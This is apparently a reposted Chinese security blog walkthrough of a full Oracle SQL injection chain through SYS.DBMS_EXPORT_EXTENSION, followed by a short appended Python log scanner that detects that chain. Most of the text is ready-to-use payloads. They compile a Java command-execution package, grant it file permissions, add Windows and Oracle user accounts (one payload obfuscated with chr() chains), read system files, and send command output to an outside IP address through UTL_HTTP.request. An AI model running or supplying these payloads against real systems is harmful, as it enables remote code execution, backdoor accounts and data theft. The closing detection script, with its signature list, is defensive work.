A worked demonstration of the full process of obtaining a cmdshell through Oracle injection

Posted on 2012-12-18 12:21:48
All the demonstrations below were executed in a web-based SQL*Plus. For a web injection, change select SYS.DBMS_EXPORT_EXTENSION..... into the form
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
(the " 'a'|| " is there to make the statement return true).
The statement is fairly long, so it may have to be submitted with POST.
The steps are as follows:
1. Create the package
By injecting the SYS.DBMS_EXPORT_EXTENSION function, create a Java package LinxUtil on the Oracle server containing two functions: runCMD, which runs system commands, and readFile, which reads files:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
------------------------
If the URL has a length limit, the readFile() function block can be dropped, i.e.:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
Also drop the statements in the later steps that deal with readFile().
------------------------------
2. Grant Java permissions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3. Create the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4. Grant public permission to execute the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5. Test whether the steps above succeeded
and '1'<>'11'||(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
6. Execute commands:
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)
Note that sys.LinxReadFile() returns a varchar, so "and 1<>" cannot be used in place of "and '1'<>".
To see the result of the command, use union:
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
Or UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
)
Note: when using UTL_HTTP.request, spaces and newlines must be replaced with REPLACE(), otherwise the HTTP request cannot be submitted. utl_encode.base64_encode also works.
--------------------
6. Internal changes
The changes to the all_objects table can be viewed with the following command:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7. Drop the functions we created
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
The end. I dedicate this article to my friends.
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
Another way to test the vulnerability:
Create an Oracle account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
That is:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
Confirm that the vulnerability exists:
1<>(
select user_id from all_users where username='LINXSQL'
)
Grant linxsql the CONNECT privilege:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
Delete the account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
The following method creates a function Linx_query() that can execute multiple statements; if execution succeeds it returns the value "1". But its privileges are inherited and may be only public privileges, so it seems to be of limited use; if you really need it, you can consider grant dba to the current User:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
)
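As an added, defender-side example that is not part of the original post, the following Python scans web access-log lines for the DBMS_EXPORT_EXTENSION injection chain the post walks through, including the chr()-encoded variant shown at the end. The signature list and the sample log lines are constructed here (modelled on the request forms in the post) and are assumptions, not data from the post.

```python
import re
from urllib.parse import unquote_plus

# Keywords that appear in the DBMS_EXPORT_EXTENSION injection chain the post walks through (assumed list).
SIGNATURES = (
    "DBMS_EXPORT_EXTENSION",
    "GET_DOMAIN_INDEX_TABLES",
    "EXECUTE IMMEDIATE",
    "DBMS_JAVA.GRANT_PERMISSION",
    "UTL_HTTP.REQUEST",
    "CREATE OR REPLACE AND COMPILE JAVA SOURCE",
)
# A chain such as chr(70)||chr(79)||chr(79) builds the string "FOO" one character at a time.
CHR_CHAIN = re.compile(r"chr\(\s*\d+\s*\)(?:\s*\|\|\s*chr\(\s*\d+\s*\))*", re.IGNORECASE)
CHR_ONE = re.compile(r"chr\(\s*(\d+)\s*\)", re.IGNORECASE)

def decode_chr_chains(text):
    """Replace every chr(N)||chr(N)... chain with the literal string it builds."""
    def build(match):
        return "".join(chr(int(n)) for n in CHR_ONE.findall(match.group(0)))
    return CHR_CHAIN.sub(build, text)

def normalize(line):
    """URL-decode twice (catches double encoding), expand chr() chains, collapse whitespace, uppercase."""
    text = decode_chr_chains(unquote_plus(unquote_plus(line)))
    return re.sub(r"\s+", " ", text).upper()

def matched_signatures(line):
    """Return the signatures present in one access-log line, in SIGNATURES order."""
    text = normalize(line)
    return [s for s in SIGNATURES if s in text]

def scan(log_lines):
    """Return (1-based line number, matched signatures) for every suspicious line."""
    hits = [(n, matched_signatures(line)) for n, line in enumerate(log_lines, 1)]
    return [(n, found) for n, found in hits if found]

# Constructed sample access-log requests modelled on the request forms in the post.
SAMPLE_LOG = [
    "GET /xxx.jsp?id=1 HTTP/1.1",
    "GET /xxx.jsp?id=1%20and%20'1'<>'a'||(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(1);EXECUTE%20IMMEDIATE%20''...''','SYS',0,'1',0)%20from%20dual) HTTP/1.1",
    "GET /xxx.jsp?id=1%20and%201<>(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69),chr(83)||chr(89)||chr(83),0,chr(49),0)%20from%20dual) HTTP/1.1",
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(found)}")  # lines 2 and 3 are flagged
```

Without the chr() expansion the third sample would only match on the function name; with it, the EXECUTE IMMEDIATE hidden inside the chr() chain is recovered as well.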